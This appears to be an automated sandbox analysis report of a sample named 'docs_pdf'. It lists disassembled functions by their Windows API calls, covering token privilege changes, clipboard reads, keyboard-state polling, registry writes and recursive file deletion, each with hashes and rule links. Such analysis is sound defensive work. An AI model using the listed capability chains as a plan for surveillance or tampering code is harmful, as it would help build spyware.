                                                            • _memset.LIBCMT ref: 0014889B
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001488ED
                                                            • CloseHandle.KERNEL32(?), ref: 001488FE
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00148915
                                                            • GetProcessWindowStation.USER32 ref: 0014892E
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00148938
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00148952
                                                              • Part of subcall function 00148713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00148851), ref: 00148728
                                                              • Part of subcall function 00148713: CloseHandle.KERNEL32(?,?,00148851), ref: 0014873A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 118cfcd43889c8695a7b9dee8eadfa207fcd54d0517f0503c48c0944de086992
                                                            • Instruction ID: f2927e42b2ea69fcc4a52c6ebdf69ef2e7f5691571d02030a0cbba54c4f7acaf
                                                            • Opcode Fuzzy Hash: 118cfcd43889c8695a7b9dee8eadfa207fcd54d0517f0503c48c0944de086992
                                                            • Instruction Fuzzy Hash: 42816971900209AFDF11DFA4CC45AEEBBB8FF08344F28416AF914A7261DB718E95DB61
                                                            Function 0016425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(0017F910), ref: 00164284
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00164292
                                                            • GetClipboardData.USER32(0000000D), ref: 0016429A
                                                            • CloseClipboard.USER32 ref: 001642A6
                                                            • GlobalLock.KERNEL32(00000000), ref: 001642C2
                                                            • CloseClipboard.USER32 ref: 001642CC
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 001642E1
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 001642EE
                                                            • GetClipboardData.USER32(00000001), ref: 001642F6
                                                            • GlobalLock.KERNEL32(00000000), ref: 00164303
                                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00164337
                                                            • CloseClipboard.USER32 ref: 00164447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 33e4f10d121118577da67a1f77d5cb86078070002c491cf3e58f71d40b9c7c29
                                                            • Instruction ID: 3e4442c36484d3cf8b282abbad8b088eb104fb948e58a1b5d933a6ae5dacf91a
                                                            • Opcode Fuzzy Hash: 33e4f10d121118577da67a1f77d5cb86078070002c491cf3e58f71d40b9c7c29
                                                            • Instruction Fuzzy Hash: C9519F31204205ABD711EF60EC9AFBF77B8AF84B00F10452DF65AD25A2DF70D9858B62
                                                            Function 0015C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0015C9F8
                                                            • FindClose.KERNEL32(00000000), ref: 0015CA4C
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0015CA71
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0015CA88
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0015CAAF
                                                            • __swprintf.LIBCMT ref: 0015CAFB
                                                            • __swprintf.LIBCMT ref: 0015CB3E
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • __swprintf.LIBCMT ref: 0015CB92
                                                              • Part of subcall function 001138D8: __woutput_l.LIBCMT ref: 00113931
                                                            • __swprintf.LIBCMT ref: 0015CBE0
                                                              • Part of subcall function 001138D8: __flsbuf.LIBCMT ref: 00113953
                                                              • Part of subcall function 001138D8: __flsbuf.LIBCMT ref: 0011396B
                                                            • __swprintf.LIBCMT ref: 0015CC2F
                                                            • __swprintf.LIBCMT ref: 0015CC7E
                                                            • __swprintf.LIBCMT ref: 0015CCCD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 7f95ac5ae3d73095cadf20e156a737d37094902b25b34f584ad2fa86e4a35d35
                                                            • Instruction ID: cbc3ee778467b38ec58fea7bfaf0682240e173d9fe827108e13e52dd9ca499c6
                                                            • Opcode Fuzzy Hash: 7f95ac5ae3d73095cadf20e156a737d37094902b25b34f584ad2fa86e4a35d35
                                                            • Instruction Fuzzy Hash: 91A11FB1508308ABC704EF54C885EFFB7ECAF94701F404929B695C6592EB34DA49DBA2
                                                            Function 0015F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0015F221
                                                            • _wcscmp.LIBCMT ref: 0015F236
                                                            • _wcscmp.LIBCMT ref: 0015F24D
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0015F25F
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0015F279
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0015F291
                                                            • FindClose.KERNEL32(00000000), ref: 0015F29C
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0015F2B8
                                                            • _wcscmp.LIBCMT ref: 0015F2DF
                                                            • _wcscmp.LIBCMT ref: 0015F2F6
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015F308
                                                            • SetCurrentDirectoryW.KERNEL32(001AA5A0), ref: 0015F326
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0015F330
                                                            • FindClose.KERNEL32(00000000), ref: 0015F33D
                                                            • FindClose.KERNEL32(00000000), ref: 0015F34F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 448f576c655f0558f785006b8774e1c4b99607275fb2eea459eb32f1e4dafcff
                                                            • Instruction ID: ca14b5655ce58ca559e3d62b15882b8549096c3936fe46a76dd10688f96c9597
                                                            • Opcode Fuzzy Hash: 448f576c655f0558f785006b8774e1c4b99607275fb2eea459eb32f1e4dafcff
                                                            • Instruction Fuzzy Hash: 4F31A37A500219AEDF54DBB4DC59ADF73ACAF09361F50417DE828D70A0EB30DACACA54
                                                            Function 00170AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170BDE
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0017F910,00000000,?,00000000,?,?), ref: 00170C4C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00170C94
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00170D1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 0017103D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0017104A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: e3171496ab8e0e74afaf052a8ab7af37a157041ee1e697888e449ead684cbca8
                                                            • Instruction ID: ca41ea1729e2261f12f94bf5af3067f38ca17a5f2f77c3856fb4a668ee19735e
                                                            • Opcode Fuzzy Hash: e3171496ab8e0e74afaf052a8ab7af37a157041ee1e697888e449ead684cbca8
                                                            • Instruction Fuzzy Hash: 940249752046019FCB14EF28C881A6AB7F5FF89714F05885DF99A9B762CB70ED41CB81
                                                            Function 0015F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0015F37E
                                                            • _wcscmp.LIBCMT ref: 0015F393
                                                            • _wcscmp.LIBCMT ref: 0015F3AA
                                                              • Part of subcall function 001545C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001545DC
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0015F3D9
                                                            • FindClose.KERNEL32(00000000), ref: 0015F3E4
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0015F400
                                                            • _wcscmp.LIBCMT ref: 0015F427
                                                            • _wcscmp.LIBCMT ref: 0015F43E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015F450
                                                            • SetCurrentDirectoryW.KERNEL32(001AA5A0), ref: 0015F46E
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0015F478
                                                            • FindClose.KERNEL32(00000000), ref: 0015F485
                                                            • FindClose.KERNEL32(00000000), ref: 0015F497
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 52ae5b7dd62c51f386a9f5e184a2aacaa187abf629fecbd7ca855b8ab401aeb0
                                                            • Instruction ID: 24b9254bed9c699808a861733a3ba6e346b6d627ac1c74fbec7e72c1eadfbcc4
                                                            • Opcode Fuzzy Hash: 52ae5b7dd62c51f386a9f5e184a2aacaa187abf629fecbd7ca855b8ab401aeb0
                                                            • Instruction Fuzzy Hash: B931E775501219AFDF109F64EC88ADF77ACAF09361F100179EC64E70A0DB30DA8ACA54
                                                            Function 001481F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
                                                              • Part of subcall function 0014874A: GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
                                                              • Part of subcall function 0014874A: GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
                                                              • Part of subcall function 0014874A: HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D
                                                              • Part of subcall function 001487E7: GetProcessHeap.KERNEL32(00000008,00148240,00000000,00000000,?,00148240,?), ref: 001487F3
                                                              • Part of subcall function 001487E7: HeapAlloc.KERNEL32(00000000,?,00148240,?), ref: 001487FA
                                                              • Part of subcall function 001487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00148240,?), ref: 0014880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0014825B
                                                            • _memset.LIBCMT ref: 00148270
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0014828F
                                                            • GetLengthSid.ADVAPI32(?), ref: 001482A0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001482DD
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001482F9
                                                            • GetLengthSid.ADVAPI32(?), ref: 00148316
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00148325
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0014832C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0014834D
                                                            • CopySid.ADVAPI32(00000000), ref: 00148354
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00148385
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001483AB
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001483BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: f37e9a3dc3b74952d6b679c9df28afe907365f0ac225349021e46f68cbb61748
                                                            • Instruction ID: cd1f7bd24035468ce8ae3267b333be986bf2ed91bb76c2cb739c2a32485b2b3f
                                                            • Opcode Fuzzy Hash: f37e9a3dc3b74952d6b679c9df28afe907365f0ac225349021e46f68cbb61748
                                                            • Instruction Fuzzy Hash: FE614871900209AFDF10DFA5DC84EEEBBB9FF04700F148169F915A72A1DB319A46CB60
                                                            Function 00106843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            • Opcode ID: 2d1847a6ec383395064b66fd248f4245935bb19c99187f97e2b19aae5b4c9299
                                                            • Instruction ID: 66f04176adb87344767e08d7c9dce53bd7f7c0e26159b20f3f3cf14e2c304800
                                                            • Opcode Fuzzy Hash: 2d1847a6ec383395064b66fd248f4245935bb19c99187f97e2b19aae5b4c9299
                                                            • Instruction Fuzzy Hash: 3D726175E002199BDF18CF58C8907EEB7B5FF58710F15816AE889EB290EB709D81CB90
                                                            Function 00170665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170737
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001707D6
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0017086E
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00170AAD
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00170ABA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 416e8b6639d0044948a3a855f28e8e1012924000928c4cddeb4850f21e2e05db
                                                            • Instruction ID: 99472a6e683d719cec33683658506d0a2ba96ab9cdb07aced9952cb87b1d0688
                                                            • Opcode Fuzzy Hash: 416e8b6639d0044948a3a855f28e8e1012924000928c4cddeb4850f21e2e05db
                                                            • Instruction Fuzzy Hash: 33E13A71604314AFCB15DF28C881E6ABBF5EF89714F04856DF58ADB2A2DB30E941CB52
                                                            Function 00150219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00150241
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 001502C2
                                                            • GetKeyState.USER32(000000A0), ref: 001502DD
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 001502F7
                                                            • GetKeyState.USER32(000000A1), ref: 0015030C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00150324
                                                            • GetKeyState.USER32(00000011), ref: 00150336
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0015034E
                                                            • GetKeyState.USER32(00000012), ref: 00150360
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00150378
                                                            • GetKeyState.USER32(0000005B), ref: 0015038A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9ff590bced1175061d1bb77e1ab3e7ad5f11f3096e0be127928d4bdf2c8eaa3a
                                                            • Instruction ID: 12fc145a6b5b276578f250e12d960a7d46b43dbdca618fd92a61df2e4693725a
                                                            • Opcode Fuzzy Hash: 9ff590bced1175061d1bb77e1ab3e7ad5f11f3096e0be127928d4bdf2c8eaa3a
                                                            • Instruction Fuzzy Hash: AD4187249047C9EEFF725AE4C8083A6BAA07B19341F48409DDDD54E5C2DBD459CC8792
                                                            Function 00164458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: 551f00697faf17acc856aff823cdf67c4e48cdfeb94e73bd8d6ea9655d1b641d
                                                            • Instruction ID: 49e534521dde6ff85a674f46ec7290d21b4be844ed57afe8cc16dd69688c52bd
                                                            • Opcode Fuzzy Hash: 551f00697faf17acc856aff823cdf67c4e48cdfeb94e73bd8d6ea9655d1b641d
                                                            • Instruction Fuzzy Hash: 4E21AE352002109FDB11AF24EC09B6E77B8EF14710F10802AF90ADB6B2DB74AC92CB95
                                                            Function 00153A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                              • Part of subcall function 00154CD3: GetFileAttributesW.KERNEL32(?,00153947), ref: 00154CD4
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00153ADF
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00153B87
                                                            • MoveFileW.KERNEL32(?,?), ref: 00153B9A
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00153BB7
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00153BD9
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00153BF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 8cebdafd0fde7a6bf8f343c44b5f3bc60adc5e00767fe59987ed2a9f56980a38
                                                            • Instruction ID: 9e31702770cd828d62bc616ae5187f5f02e507364b1c88d9c951ff468d982f0e
                                                            • Opcode Fuzzy Hash: 8cebdafd0fde7a6bf8f343c44b5f3bc60adc5e00767fe59987ed2a9f56980a38
                                                            • Instruction Fuzzy Hash: 4251A23180524C9ACF05EBA0CD928FEB778AF14301F244169E9667B092DF316F4DDB61
                                                            Function 0015F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0015F6AB
                                                            • Sleep.KERNEL32(0000000A), ref: 0015F6DB
                                                            • _wcscmp.LIBCMT ref: 0015F6EF
                                                            • _wcscmp.LIBCMT ref: 0015F70A
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0015F7A8
                                                            • FindClose.KERNEL32(00000000), ref: 0015F7BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
